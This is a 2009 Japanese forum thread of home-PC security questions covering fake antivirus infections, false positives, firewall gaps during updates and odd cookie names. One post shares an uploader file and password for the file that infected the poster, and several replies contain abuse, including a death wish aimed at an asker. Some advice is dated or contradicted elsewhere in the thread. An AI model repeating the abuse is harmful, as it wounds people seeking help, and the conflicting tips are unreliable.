MBMAとSuperantispywareでほとんど完治する
もちろん、セーフモードでもスキャンする
なんでもかんでも、大手術するやぶ医者は、必要ない
ただの、フェイクセキュリティソフトでしょ
薬で治ればそれで良し
リカバリは、その次にやれば良い
針小棒大に、素人を脅すなよ
>>738 入手元がはっきりしないと、入っているのが、想定している物とは違う可能性があります。
想定しているものでない場合、本当に除去できるとは限りません。
FakeAVは、数日に1つは新しいものが出ていますので、MBAMで対応しているとは限りません。
また、導入したファイル名がはっきりしている今回の相談者さんはましな方ですが、
どこで踏んだのかわからない、なにが入っているかわからない状況のものを、確実に安全な環境に
戻す為には、PCリカバリが一番確実な解決策です。
ぶっちゃけ
>>26 。
virus totalでスキャンしたとき 7.5%(3/40)って結果が出たんですがどうするべきでしょうか? 感知したアンチウイルスはa-squaredやIkarusで高リスクのトロイです。 感染したファイルは市販のソフトです。
>>728 コーデック類は罠な場合が多いので、信頼出来るコーデックを正式サイトからダウンロードすべきだったね
ダウンロードしたURLも覚えてないの?
>>742 内容を見せてくれないとなんとも・・・
>>743 あんたに見せてもなにも解決しない。もう出てくるんじゃねーぞ。
内容とはスキャンの内容でしょうか? a-squared 4.5.0.24 2009.07.29 Virus.Win32.Sality!IK Ikarus T3.1.1.64.0 2009.07.29 Virus.Win32.Sality Sophos 4.44.0 2009.07.29 Sus/UnkPacker 感知したのは上記の3つなんですがどうでしょうか。
>>742 信用できる配布元の場合、検出したベンダーに誤検出の疑いとして検体提出を行ってください。
判断が付かない場合は、配布元に報告する程度で。
使い続けるかどうかは自己責任でご判断ください。
>>746 、747
ファイルを検体提出してきます。
回答していただきありがとうございました。
>>745 Ikarusはヒューリスティック効き過ぎで、検出力高いが誤検出も非常に多い諸刃の剣。
a-squaredも同様に誤検出が多いので定評がある。しかも最新Ver.はIkarusエンジン搭載している。
末尾のIKはIkarusエンジンでのナニだろう。
Sophosでの頭にSusが付いてるのは擬陽性ということ。
よってこのケースは十中八九誤検出で間違いなし。市販のソフトなんだろ。
750 :
728 :2009/07/29(水) 21:18:15
MBAMさん
ありがとうございます 早速試してみます
>>736 さん
大事なデーターは別HDに移動してありますので最悪リカバリを考えています
アップローダー 斧 2MB Sc_22457.zip
パスzzzzzzzx
感染の原因となったファイル一応アップさせていただきました
明日には消します
余談ですが、昨晩パターン更新したAntiVirではスルー対象でした。 今、パターンを更新してからスキャンした所、検知しましたので、かなり新しいもののようですね。
>>752 いつもリンク貼るだけ貼って、主語と句読点が無いからとても見づらい。
756 :
名無しさん@お腹いっぱい。 :2009/07/29(水) 21:49:33
【使用OS】 『XP SP2』
【PCスペック】 『CPU: AMD Athlon64X2 6000+ 3GHz 、メモリ: 2GB』
【使用ブラウザ】 『Firefox 2』
【Microsoft Updateの更新の状態】 『自動更新設定』
【セキュリティソフトと年式】 『avast、Bitdefender CL版』
【その他スパイウェア対策ソフト】 『spybot、spywareblaster』
【回線の種類・ルータの有無】 『ADSL』
【具体的な症状】
「コンピュータウイルス入門」というサイト
ttp://www.geocities.jp/excelover/virus.html (危険と思われるので注意!)
このサイトを見たらavastが反応しました、接続を遮断という処置をとり
その後BitdefenderのCL版でCドライブをスキャンしましたがウイルスは見つかりませんでした
これがavastのログです(hは抜いてあります)
Sign of "VBS:MailWorm-gen [Wrm]" has been found in "
ttp://www.geocities.jp/excelover/virus.html\{gzip} " file.
どうすればよいでしょうか?感染していないと見て大丈夫でしょうか?
遮断したならほとんどの場合は大丈夫です。 たまに、複数の攻撃手段をとって、そのうちの幾つかだけ遮断して、実際はすり抜けて感染されている なんてこともあるので、保証まではできないです。
>756 ページ中段辺りに青文字で >アンチウイルスソフトによっては「このページが感染している」旨のメッセージを出すと思うが、このようなテキストとして閲覧する限りは >感染の心配はないのでご安心を。 と書かれてました。 おそらくその下のソースコードに反応してるんじゃないかと。
759 :
名無しさん@お腹いっぱい。 :2009/07/29(水) 22:01:45
>>725 もおねがいします。
windowsXP SP3 520MB 120GB よろしくおねがいします。
>759 通常ではありえませんな。 家族の誰かがユーザー名を勝手に変えたんじゃない?
761 :
756 :2009/07/29(水) 22:13:06
762 :
728 :2009/07/29(水) 22:29:13
MBAM様 mbanを使用しlogを提出しようと思ったらIEも2chブラウザもエラーが起きてしまい 手間取りました 今はfira foxでなんとか・・・ 早速log提出させていただきます 凄い数で驚きました 1度では文字数オーバーしてしまいますので また斧にUPさせていただきました お手数おかけします 斧 2MB Sc_22503.txt パスzzzzzzzx よろしくお願いします
>>762 752の設定をしたら
一度PCを再起動して下さい
走りっぱなしだと駆除できないからね
>>762 MBAM=八頭は、信用できない回答者です。相手にせずに、PCリカバリを行ってください。
今回のケースでは、まだ対応していない可能性が高いため、セキュリティソフトでの除去を考えない方が良さそうです。
>>765 同一人物じゃないと思うぞ
MBAMがこの先もコテをつづけるようならこのスレ潰すことになっても
粘着する
767 :
728 :2009/07/29(水) 22:49:25
もう一度mbanで検索してみたんですが気になるエラーがあったので 報告させていただきます An error occurred. Please report the following error code to the Malwarebytes Anti-Malware support team. Error code : 731(0.6)
>>767 うぜえ死ね
寝てるうちに母親にでも殺されろ
>>767 それはマルウェアの検知ではなく、ソフトのエラーです。
サポートチームに連絡してくださいとありますが、(そのソフト使ってる人には悪いですけど)無視して構いません。
多分、感染中のマルウェアが動作を阻害したとかそんなことではないでしょうかね。
MBAMをいじっていても解決しませんので、PCのリカバリを行ってください。
なんとなくいじるのが楽しくなったなら、勝手にやっててください。(但し、感染を余所に撒き散らす前に復旧させてね)
770 :
728 :2009/07/29(水) 23:12:47
リカバリーします ありがとうございました
わかりました 死にます
さようなら
775 :
名無しさん@お腹いっぱい。 :2009/07/30(木) 02:00:32
マカフィーのウイルススキャンとPFWだけを入れてる場合、 IE7のフィッシング詐欺検出機能はONにした方がいいでしょうか?
>775 う〜んとりあえずしとけば、気休め程度になるかな〜… 他の人からレス待ってみては?
777 :
名無しさん@お腹いっぱい。 :2009/07/30(木) 02:15:52
>>776 早速ありがとうございます。
とりあえずONにしましたw
どなたか「マカの機能とかぶってる」と思われる方がおられたら教えてください。
サイトアドバイザはうざいので入れてません。
>>774 それ、さっき各社に検体提出したので大人しく待て。
あと、どう見てもスレ違いだからここに書くのはやめれ。
OS:WinXP CPU:Pen4 Mem:512MB 職場で使ってるのはこんな構成のノートPCなんだけど、あんまり重くなくて それなりにセキュリティの高いオススメソフトを教えてください。 ウィルスセキュリティZERO使ってたら、職場で流行ってた USB経由のトロイに感染してたから、別のを探してます。
780 :
名無しさん@お腹いっぱい。 :2009/07/30(木) 10:14:33
>>759 です。
>>760 様
ありがとうございました。
通常ではありえないことと聞き、とても驚いています。
ウイルスバスターやノートンオンラインをし、スパイウェアなども調べたのですが、何も出てきません・・。
未知のウイルスに感染して、このような状態になってしまったrということでしょうか?
cookie:本名(4文字の本名です)@〜がcookie:蒼@〜になったのはやっぱり異常ですよね。
外部から操作されている可能性もあるのでしょうか?
おねがいします。
>>779 軽くてまともなセキュリティソフトと言ったら、ESS(NOD32)かAntiVirの2択かな。
初心者向けなのは、日本語表示のESS(Eset Smart Security)。
但し、AntiVirに比べると検出能力の点では劣ります。(ウイルスセキュリティZEROと違って、ごく普通程度ではありますが)
>>781 ありがとうございます。ESSを検討してみます。
783 :
名無しさん@お腹いっぱい。 :2009/07/30(木) 11:00:21
>>780 もおねがいします。
対処法が分からず、困っております。
>>778 検出可否スレのほうが早かったようですね。
その検出可否スレに八頭が出現した件についてですが、
相変わらずモザイク付きのスクショを貼るとは、勘違いも甚だしいですよねえ?
>784
結局2バイト文字でログオンというオチですか。
すみません。ウイルスバスターのことについてお尋ねします。 アップデート機能を開始しダウンロード完了後のインストール中によくファイアウォールが10〜20秒の間、無効になります。 その間、パソコンが無防備になっているのではないかと思うのですが、これは気にしなくても良い範囲なんでしょうか?
>786 その代わりにWindowsの標準FWが有効になるから問題ないです。
>787 でも、ウイルスバスターが無効になった時にセキュリティセンターの警告で、ファイアウォールが無効になっています。コンピュータが危険にさらされている可能性があります。 と表示されます。 この表示が出ていてもWindowsの標準FWは有効になっているんですか? 何か設定が必要だったりするのでしょうか?
神経質すぎ
さっきなんか急にメモリの空きがなくなって (タスクマネージャで見てもあまり使ってないのに他のソフトで警告された) その後データ実行防止しましたとかいわれました どういう意味ですかね
なんかのウィルスですかね? とりあえずメモリーは解放されたんで大丈夫ですかね?
なんかすげー心配 なんだったんですかね あれ
>>786 バスターの基幹部分のソフトがアップデートされ、再起動をかけている状態ですね。
PCを起動して、セキュリティソフトが起動するまでのタイムラグのようなものですので、
気にしなくていい範囲です。
但し、その間は、(メッセージ通り)セキュリティソフトが無効になっていますので、
他のタスクを実行せず保護が開始されるまで待った方がよいでしょう。
>>787-788 なりませんよ。メッセージ通り無効の状態です。
>>790 メモリリークしてたり、無効なアドレスを読みに行こうとしたものがDEP(データ実行防止)によってブロックされたようですね。
バグのあるアプリを使用しているのか、意図的に他のタスクに侵入しようとしたのが阻止されたのかはわかりません。
790-792さんが同じであると仮定すれば、メモリリークしてるソフトがブロックされただけでしょう。
>>794 ありがとうございます
安心していいんすかね
>793 バスターってとんでもないセキュリティソフトですね。 常駐してる時は標準のFWを無効にするのは良い事だけど、 非常駐の時は標準のFWを有効に戻してくれたっていいじゃないか。 ルータ有れば別に気にすることないが…。
>>796 日記は他に書いて
ここは雑談スレじゃない
ハチ公 早くノートンスレ立てろよ
チラ裏カキコ 786は、よくPFWが無効になる。というけれど、 通常のアップデートはパターンファイルだからPFWは有効のままが普通だと思うのだが…。 多分現行Ver(2008,2009)を使用しているのだろうが、これらはうpだての度にPFWが無効になってしまうようになったのかな。 それとも頻繁にPFW本体のうpが行われているのだろうか?
俺って危険なサイト踏んでも感染しない無敵の環境 ゼロデイだろうが全然関係ないし。 だからこそ特攻することができるのである!
>801 φ(´д`)ノシ
>>793 やはり無防備になってしまっているんですね。
気にしなくて良い範囲とのことでホッとしました。
でも、やっぱり不安なのでインストールが始まったらLANケーブルを抜いておくようにします。
ありがとうございます。
>>796 そうですよね。数多くのシェアを持っている一流企業のソフトなのだから、そういったところのケアも考えてほしいものですよね。
やはりルーターと二段構えで守るのが一番いいのでしょうが、4台のパソコンに設定とかしなきゃならないと思うと気が重いw
>>799 はい。あなたのおっしゃる通り、パターンファイルの書き込みのみのときはPFWが無効になることはありません。
アップデート時にメールなんちゃらの更新っていうのやその他の更新がある時にPFWが無効になります。
たまにPFWは有効でウイルスチェック機能が一時止まるといった状態でインストールが行われることもあります。
ただ、アップデートを繰り返しているとメールなんちゃらの更新などが行われる機会が結構多い上、そのたびにPFWが無効になっています。
それで気になって調べてみたのですが、わからなかったため質問させていただいた次第でございます。
805 :
799 :2009/07/31(金) 00:11:41
>>803 パターンファイルといっても1つではないから。
最後に使用していた2006だとウイルス、スパイ、迷惑メールの3つだったと思う。
いずれもPFWが無効になることは一度もなかった。
迷惑メールは無効設定(パターンは自動更新)にしてありました。
当然、検索エンジンうpのときは別で、さらに再起動有りでした。
ルータの無いユーザーも為にも改善してもらいたい仕様ですね。
806 :
名無しさん@お腹いっぱい。 :2009/07/31(金) 02:34:59
例えば、ウイルスがマウスなどのハードウェアに感染してて、 そのマウスを別のPCなどに差し込んだ場合に、電源入れる→デスクトップ画面→ブルー画面が出て再起動→ こういうエラーを出す場合ってあります?
そのマウスなどに記録媒体があればな。
808 :
名無しさん@お腹いっぱい。 :2009/07/31(金) 04:24:24
gooのパスワードを忘れて、再発行の質問も忘れてしまって困っています。 インターネットのプロパティ>>閲覧の履歴の削除>>パスワードの削除 を行えるようなんですが 逆にパスワードを調べることは出来ないでしょうか? 長年使ってきたID(gooの)でなんとかパスワードを知りたいんです。 おねがいします。
810 :
名無しさん@お腹いっぱい。 :2009/07/31(金) 04:51:23
>>809 ありがとうございました。
自分はIE7なので、IE PassViewを使うことになるようなんですが、このソフトは
>IE PassView は Internet Explorer に保存されているパスワードを復元するツールです。
となっています。
復元ではなく、中身を見て、パスワードをメモしておきたいんですが、これを使ってそういうことは出来るのでしょうか?
811 :
名無しさん@お腹いっぱい。 :2009/07/31(金) 04:54:47
あの、それと、IE PassView をダウンロードして、ウイルスバスター2009でウイルスチェックすると、ウイルスだという結果になるんですが、大丈夫なんでしょうか?
作者のサイトにスクリーンショットが有ったでしょ? 画像の通り、URL・ユーザー名・パスワードが表示される。 バスターが検出するのは悪用されたら危険だからだろう。 起動オプションを付ければ取得した情報をファイルに出力できるし。 ああ後、右クリックから「Copy〜」を選択すればコピペできるよ。
813 :
名無しさん@お腹いっぱい。 :2009/07/31(金) 06:49:57
ウイルスバスターでスキャンしてもなにもでなっかったけど f-secureでしたらスパイウェアが5でました なんでですか?
2ちゃんが統一系と聞きました だから定期的にキャッシュクリア にしないと延々と追跡されるということです PCと携帯の各々のキャッシュクリアの手順を教えてください
vaioのぱそこんで 先日初期化したんだけど ノートンのソフトが期限切れだったけど 更新して3ヶ月使用できるようになってた これってちゃんと最新のウイルスデータに こうしんされてるの?
Adobe Flash Playerを新しい「10.0.32.18」にしたんだけど、 IEのアドオンの管理の所のバージョンが「8.0.20.0」になってるのは 問題ないのでしょうか? アンインストール→PC再起動→再インストールしても8.0.20.0のままです。 プログラムの追加と削除の所と、Webでのバージョンチェックは 最新の10.0.32.18になってます。
Shockwave Flash Objectのことなら10.0.32.18になっていないとおかしい
>>816 インターネットオプション -> 全般 -> 閲覧の履歴 -> 設定
-> インターネット一時ファイル -> オブジェクトの表示
に古いバージョンのものがあるなら削除する。
(新しいものはそこに表示されなくても正常)
パソコンの名前が5文字の姓名なんですが、クッキーを見たら、二文字の知らん名前になってました。 どういうことでしょうか?
同じ人いたんだ でもユーザー名を作り直す気はないんですよ ウイルスやスパイウェアじゃないなら、それでいいんです クッキーの名前変わるのってウイルスとかのせいなんですか?
2バイト文字が原因
5文字の漢字から2文字に変わっちゃってたけど、2文字のほうも漢字でしたけど、気にしなくていいんでしょうか?
全角ログオン名だけど、今のところ漢字5文字からわけわかんない漢字二文字に変わってしまってるだけで、特にトラブルはないんですよね
826 :
名無しさん@お腹いっぱい。 :2009/07/31(金) 21:46:53
HG/WEBDefenderというのが最近サイト開く度にびっくりマーク と共に出てきてうざいんですが、これ消す方法どなたか 知りませんか?
828 :
名無しさん@お腹いっぱい。 :2009/07/31(金) 22:30:38
>>827 そうそうこれこれ!
ありがとう!おかげで直りました!!
マジで心から感謝します!!!
>>825で安全なんでしょうか?
>>817 おっしゃる通り、Shockwave Flash Objectのことでした。
>>818 「オブジェクトの表示」にあったのは最新バージョンでしたが、
それを削除してアンインストーラーで完全消去して
再インストールしたらちゃんと表示が10.0.32.18になりました。
オブジェクトの表示に存在してたのが問題だった様です。
ありがとうございました。
ブラクラではなくグロの鑑定スレってどの板にあったっけ? 分かんなくなった
WindowsVisatはUDP 3702 TCP 5357 TCP 5358で ファイ共有をする?らしいのですが、ルータでこれらのポートを閉じる必要はないのでしょうか? ぐぐってもそれらを推奨、実行しているサイトがありません。
セキュリティーのために ネット専門PCと非ネット作業用PC分けようと思うのですが 非ネットの作業用PCにもUSBなどで外部とのデータやりとりで接触がある場合 OSやらウィルス対策ソフトの定義くらいはネット接続で更新したほうが安全でしょうか? USBメモリもネット接続とかわらない程度の危険度はありそうで
ネット専用PCで定期的に修正や定義ファイルを落とし、 ウイルスチェックなどを確りしてから非ネット作業PCに 持って行って適用する。
838 :
836 :2009/08/02(日) 03:00:04
>>837 ありがとう 参考になります
修正や定義ファイルをコピーして作業用PCに持っていくのですね
知識がなくその両方がどこにあるのかよくわからないのですが
場所を見つけて落としてやってみようと思います こういう使い方している方は
結構いるのでしょうか? だとすると心強いです
何が何処へ繋いでるって画面無かったっけ?
>>840 自分のIPだけ消してうpしますからよろしくお願いします
842 :
839 :2009/08/02(日) 06:52:11
843 :
839 :2009/08/02(日) 07:06:17
診断君で見たremote addrとPCでみたローカルエリア接続の詳細でみたIPが違うんですが これはどうなってるんでしょうか?串は挿していません
>>843 ルータで接続してるならルータのWAN側のアドレスが外から見えるアドレスになる
すいませんけど、
>>825 でやってても大丈夫なんでしょうか?
知人のノートPCがウィルスにかかり、 "プログラムの追加と削除"や"msconfig"等システムに関する物が起動出来なくなり、 セーフモード起動しようとしても、 "STOP 0x0000007B"でブルーバックしてしまいます。 そこで、手元にKNOPIXのLiveDVDがあるので、 せめてウィルスソフトの自動実行を止めたいと思うのですが、 どうすればLinux上からWindowsのレジストリを弄る(スタートアップを弄る)事が出来ますか? それとも別のアプローチの仕方があれば教えて頂きたいです。
>>846 KNOPPIXのLiveDVD使ってデータ救出した後、リカバリ
【使用OS】 『XP』 【PCスペック】 『CPU:1.7 GHz 、メモリ:2G』 【使用ブラウザ】 『IE8』 【Microsoft Updateの更新の状態】 『自動更新 【セキュリティソフトと年式】 『何も搭載してない』 【その他スパイウェア対策ソフト】 『同上』 【回線の種類・ルータの有無】 『光回線でルーター無し』 【具体的な症状】 『yahoomail等フリーメールなどアクセスできないことが多々ある。 サイトによっては画像が×になることが多々ある。マイクロソフトアップデートでの Windows XP 用セキュリティ更新プログラム (KB955069) Windows XP 用セキュリティ更新プログラム (KB954600)がインストールできない。』 【過程 措置】 IEを再インストール、C;のみをリカバリ、複数のオンラインチェック試行でウィルス検知無し。
>>848 なんとかリカバリせずに済みそうです。
掛かってたウィルスはSystem Security 2009と名乗るもの。
症状はスタートアップでアンチウィルスソフトっぽい物が起動し、
勝手にスキャンっぽい事をして、「ウィルスに掛かってるよ、直す為にこれ買ってね」
てな感じに誘導される。壁紙も怪しい警告文に変わる。
で、KNOPPIXでWin上のファイル弄ろうとしたら、
私もファイルシステムの違いとか分からなかった\(^^)/
そういえばWinインストールディスクに回復コンソールなる物があったな、
って事で自分のディスクを入れて、ディスクからブートを忘れてそのまま起動、
あれ?変なスキャンが始まらないと思ったら、msconfigもregeditも使える。
これは勝つる!ということでタスクから奴を殺し、スタートアップから消し、
実行ファイル自体も消し、通常起動確認。
後はノーガードだった知人のPCにセキュリティソフト入れておきます。
WinインストールCDが症状を和らげたのには驚きでした。
>>850 悪いこと言わんから素直にリカバリしとけ。
今までノーガードだったならそれだけで済む可能性は低い。
(ο^д^)ノシ
853 :
名無しさん@お腹いっぱい。 :2009/08/02(日) 19:49:55
【使用OS】 『XP home SP2』 【PCスペック】 『CPU: Celelon 、メモリ: 1GB』 【使用ブラウザ】 『Firefox』 【Microsoft Updateの更新の状態】 『自動更新』 【セキュリティソフトと年式】 『avast、Bitdefender CL版』 【その他スパイウェア対策ソフト】 『spybot、spywareblaster』 【回線の種類・ルータの有無】 『ADSL回線』 【具体的な症状】 タスクマネージャにwmiprvse.exeというプロセスがユーザー名で常駐しています これはウィルスとみていいのでしょうか 【過程と措置】 とりあえずそのパソコンはネットにはつないでいません
C:\Windows\System32\Wbem\wmiprvse.exe はWindowsのWMIで使ってる正規ファイルですよ。 常駐するケースもあります。 C:\Windows\System32\wmiprvse.exe なら怪しいですが。
855 :
853 :2009/08/02(日) 19:59:25
とりあえずそのパソコンを調べてきます でもこのプロセスはユーザー名で常駐するものなのでしょうか?
856 :
名無しさん@お腹いっぱい。 :2009/08/02(日) 20:51:41
【使用OS】 『XP Home SP2』 【PCスペック】 『CPU:320GHz 、メモリ:384MB RAM』 【使用ブラウザ】 『IE 7』 【Microsoft Updateの更新の状態】 『自動更新かも?』 【セキュリティソフトと年式】 『McAfeeを購入して毎年自動更新』 【回線の種類・ルータの有無】 『ADSL』 【具体的な症状】 SpywareDoctorでスキャンすると、「脅威が発見されました」、となりますが、 McAfeeでスパイウェアをスキャンしても何も反応を示さず、 PCがスパイウェアに犯されているのか判断つきません。 McAfeeを信じてよいのでしょうか。 それから、セキュリティとは関係ないのですが・・・・ IE 7に更新されてからPCがとても重くなり、時にはエラーだかで ブラウザを閉じないといけなくなります。 もとに戻すにはどのような操作をしたら良いのでしょうか。 よろしくお願いいたします。
norton2005を使用してます。 最新定義ファイル更新情報がメールで来るようになってます。 このメールで来る回数を減らしたいのですが、 どうすればよいのでしょうか?
norton2005を使用してます。 norton2005を使用してます。 norton2005を使用してます。 norton2005を使用してます。 m9(^Д^)プギャー
\(^O^)/オワッタ
>CPU:320GHz 未来のPCでつか
小さい会社やってるんだけど、 取引先の大手企業から、 「お前のとこの情報漏洩とか、P2P対策はどうなってる?」と訪ねられて、 困ってます。 なにか手っ取り早い方法ありますか? 専門業者に頼む予算はないので P2P実行させないフリーウェアとかあったらいいなと。 詳しい方いらっしゃったらお願いします。
P2P対策なら、従業員さんがP2Pも含め勝手にソフトをインストールさせない管理体制を答えれば良いと思うが。 たとえば"管理者はわたしで、ほかの従業員にはユーザ権限で利用させている。"とか。 答えるだけでなく実際管理しないと。
疑問に思うのですがカスペルスキーやF-Secureのオンラインスキャンは どのような仕組みでPC内をスキャンしているのですか? virustotalみたいにファイルをアップロードしているわけでもなく スキャン中に通信が行われている様子もないので気になります
865 :
861 :2009/08/03(月) 12:20:45
〉〉864 ありがとう。 その証明書っての良さげだね。 探したら、“P2P killer”ってのも試してみようかと。
ネタエージェントの証明書なんか出したら、笑い物。
(ο^д^)ノシ
>>863 SUN JavaとかActiveXを利用して実行されている。
以前のPC内では、例えば、Excelで作ったファイルをWord に貼り付けても、Excelで編集すると
Wordに反映されただろ?OLEという仕組みだけど、それをNET越しに実現しているわけ。
WinUpDateも同じ仕組み。簡潔に言えば、NET上のファイルと自分のPC内のソフトは、境がない。
昔は、わざわざDLして、インストして、さらに実行させる、って手順を踏んだけど、自動になった。
ただね、便利になった分、悪意が入り込む要因ともなっていることを忘れずに。
>>868 > SUN JavaとかActiveXを利用して実行されている。
どっかのオンラインスキャン用のActiveXにセキュリティホールが見つかって
狙われた事があったな
Virus Totalみたいにファイルを投げてスキャンするところは安心して使えるが
ActiveXインスコしてHDスキャンするところは常に不安が付きまとう
カスペルの体験版をダウソしたんですが、検知したウィルスの駆除が実行できません。 悪意が潜在するプログラムと危弱性が表示されているんですが、右クリックの「全て駆除」を選択できないんです。 どうしたら駆除できるんでしょうか
押尾のせいでスレがみれん
>>870 マジレスすると
悪意が潜在するプログラム=ウイルスのうたがいがある。
脆弱性は修正すべきところで駆除するところではない。
ウイルスの疑いがある場合は駆除ではなく隔離。
真性ウイルス確定なら削除。
実行中のファイルは駆除、隔離、削除が出来ない。
感染後にセキュリティソフトいれても遅いです。
セキュリティソフトの基本は治療薬ではなく予防薬と考えましょう。
性質の悪いウイルスに感染したなら思い切ってリカバリしちゃいましょう。
すいません、いくつか質問があります exe、scb、scr、bat、com、cmd、pif、wsf、wsh、vbs、js、lnk 思いつくあたりで注意したほうがいい拡張子はこのくらいでしょうか 他にもあるのでしょうか コントロールパネル>フォルダオプション>タグ「表示」で 「すべてのファイルとフォルダを表示する」を選び 「保護されたオペレーションシステムは表示しない」のチェックを外せば どんなファイルでも表示されるようになるのでしょうか
.cplもあったような気がす
875 :
名無しさん@お腹いっぱい。 :2009/08/04(火) 00:40:54
>>873 pe「Portable Excutable」がとりあえず抜けてる。これexeと同じで、標準的なWindowsの32ビットの実行可能なファイル。
あと、拡張子の表示設定ではレジストリをいじらないと表示できない項目も有るから調べれ。
?
>>all
テンプレにもある「ソースチェッカーオンライン」年末で閉鎖しちゃうんだって。
残念だけど、年末まで利用させてもらうよ。
そしてありがとう。
>>877 (´ー`)ノシ
性懲りもなくま〜た意味の無い画像(と思われる)を張っている御仁が…
879 :
ああ :2009/08/04(火) 04:33:44
ネット初心者です、さっき携帯で色々検索していたら 画像みようといたらssl認証?みたいなのになってキャンセル ってでたけどキャンセルおし忘れ接続しちゃったけど、これなんですか?やばいです?
やばいと言えばやばい
>>876 今更そんなこと言われても
すごいこと言ったつもりなのか
avast4.8(データベース8月4日)で検査したところ A0078362.exe Win32:MalOb-C[Cryp] A0078627.exe Win32:MalOb-C[Cryp] A0083150.exe Win32:Trojan-gen{Other} という3つのファイルが検出されたので ファイル名でぐぐってみたのですが誤検出かどうか具体的な情報は得られませんでした これらは削除しても大丈夫でしょうか?
>883 ファイル名からして、_restoreフォルダ内からの検出ではありませんか?
886 :
883 :2009/08/04(火) 20:54:35
>886 こんなのな、システムの復元機能を無効にすれば一掃できます。 ただ、無効にしたら、それまでの復元ポイントが消滅してしまいますけど、 再度有効にすれば、新しく復元ポイントが作成されますので。
888 :
856 :2009/08/04(火) 21:11:23
すみません、
>>856 をお願いします。
(訂正)
【PCスペック】 『CPU:320GHz 、メモリ:384MB RAM』
→CPU:3.20GHz
889 :
883 :2009/08/04(火) 21:24:39
・アンチウイルスソフトによるスキャン ・アンチスパイウェアソフトによるスキャン ・タスクマネージャとa-squared HiJackFreeでプロセスの確認 ・拡張子の表示 最低限やっておくべきことはこれ以外にもありますか
>>856 SpywareDoctorでの検出名と検出箇所はわかる?
なかなか検出力もいいらしいけど、ちょくちょく誤検出もあるからね
>>890 ・アンチウイルスソフトによるスキャン ← 1年間常駐保護してくれるセキュリティが一番重要
・アンチスパイウェアソフトによるスキャン ← ここ(セカンドスキャナ)はフリーになると思うけど、やる気の無いベンダが多数なのが現実
・タスクマネージャとa-squared HiJackFreeでプロセスの確認 ← 初心者にしては良い習慣だと思う (greatis.comなども参考に)
・拡張子の表示 ← ネット経由入手のファイルなどは、まずvirustotal.comをくぐらせる習慣(複数のスキャナでチェック)もすべき
>>3 に紹介している、信頼出来る最新ニュースメディアも定期購読する習慣をつける。(個人サイトの情報は内容がやや古いままの場合が多い)
長くなるんでNortonスレのテンプレをw
http://pc11.2ch.net/test/read.cgi/sec/1248903246/7-8
893 :
890 :2009/08/05(水) 03:15:14
MS-DOSウィルスとはどんなウィルスですか
いつの間にかレジストリのファイル(拡張子.reg)の、既定のプログラムがメモ帳になってたんですが、 これってウィルス感染したような形跡でしょうか?
>894 昔のウイルスっす >895 感染ではありません >いつの間にかレジストリのファイル(拡張子.reg)の、既定のプログラムがメモ帳になってたんですが こうなる前に行なった操作を思い出してください。
897 :
894 :2009/08/06(木) 00:52:20
>>896 まず無いという感じはしますが
今ではMS-DOSウィルスにはどんな感染経路があるのでしょうか
[ 便利 ] 2ch専用ブラウザ [ 推奨 ]
900 :
894 :2009/08/06(木) 18:24:58
ダウンロードした圧縮ファイルにウイルスチェックしたらトロイの木馬が検出されたので 解凍せずゴミ箱に入れて消去したのですが、これってセーフなのですか? 一応全スキャンしましたが検出されなかったです 使っていたソフトはAVG8.5です
>>903 解凍する前にスキャンしてよかったね
モノによっては誤検出の可能性もあるけど破棄するのが得策でしょう
圧縮ファイルにウイルスが入っていた場合 コピーや移動はセーフなんですよね?
無線LANのセキュリティ問題について右も左もわからないので教えてください
大学の図書館で無線LANに接続しているんですが、パスワード等のリクエストを傍受されないか心配です
FTPでレンタルサーバーに接続したり
アマゾン等でクレジットカードの番号を入力することもあるのですが危険でしょうか
WindowsUpdateとウイルス定義パタンの更新は随時おこなっています
Windowsのコントロールパネル>ワイヤレスネットワークの管理>プロパティでは、
アクセスポイントが
セキュリティの種類:認証なし(オープンシステム
暗号化の種類:なし
になっています
コントロールパネル>ネットワークとセキュリティセンター>共有と探索
の項目はすべて無効にしています
大学のHPで係るFAQを見ましたが、各自ウイルス対策ソフトをいれてください
くらいしか書かれていません
http://web.mita.keio.ac.jp/info/security.html
尼はSLLで暗号化してるだろう。 FTPはオワタだと思うけどそれなら有線でも同じ事。無線とかは関係ないないよ。
VirtualPCを使うにはもう1つOSを購入すする必要があるのですか
LinuxでWindowsのウイルスは動かんだろ。 MSがIE8検証用のVPCイメージを公開してるからそれ使えば?
windows operating system にUDPで接続してくるIPがあるんですが これは進入されてるんえすか?
自宅に以下のようなネットワークがあります。 モデム | ルーター1 − PC1 | ルーター2 − PC2 ルーター1とルーター2はネットワークが異なっていてPC1とPC2は同一LAN上にはありません。 このようなネットワーク上で、PC1がウィルスに感染した場合、PC1からPC2に感染する可能性はあるでしょうか?
PCを起動するとWindowsDefenderがPWS:WIN32/Daurso.Aというのを検出します そのたびに除去しているのですが、PCを再起動するたびにまた検出します 全スキャンしても状況が変わらないのですが、どうすればよいでしょうか? よろしくお願いします
失礼しました 【使用OS】 WinXP 【PCスペック】 CPU: 2GHz 、メモリ: 2GB 【使用ブラウザ】 Fx3 【Microsoft Updateの更新の状態】 自動更新設定 【セキュリティソフトと年式】 AVGFree8.5 【その他スパイウェア対策ソフト】 WindowsDefender 【回線の種類・ルータの有無】 光回線でルータ 【具体的な症状】 PCを起動するとWindowsDefenderがPWS:WIN32/Daurso.Aというのを検出します そのたびに除去しているのですが、PCを再起動するたびにまた検出します 全スキャンしても状況が変わらないのですが、どうすればよいでしょうか? よろしくお願いします
どこで検出しているかわからないです USBメモリも特につないでいないのですが・・・・・・・ 検出場所の捜索方法ってあるんですか? WindowsDefenderのログあさっているんですがよくわかりません・・・・
【使用OS】 『XP home sp2』 【PCスペック】 『CPU:2GHz 、メモリ:2GB』 【使用ブラウザ】 『firefox』 【Microsoft Updateの更新の状態】 『自動更新設定』 【セキュリティソフトと年式】 AVG8.5 bitdefenderコマンドライン 【その他スパイウェア対策ソフト】 spybot bitdefenderのコマンドライン版を使っていて疑問に思うことが2つありました 疑問その1 exeファイルをbitdefenderのコマンドライン版でスキャンすると そのファイル1つだけスキャンして「files 1」で終わる場合と exeファイル内のファイルを全部検査してくれる場合がありますが 色々なフリーソフトのインストールexeを試しましたが 同じexeファイルでも何か違いがあるのでしょうか 疑問その2 圧縮ファイルやイメージファイルの形式によっては中身まで検査してくれないことが あるのでしょうか?もしその圧縮ファイルだけしか検査しなかった場合は中にウイルスが 潜んでいる可能性があるのですか
>>919 >これのとこかな?
そんなもん見せても初心者がわかるはずないだろ。
もうちょっと考えろ
923 :
名無しさん@お腹いっぱい。 :2009/08/09(日) 00:49:19
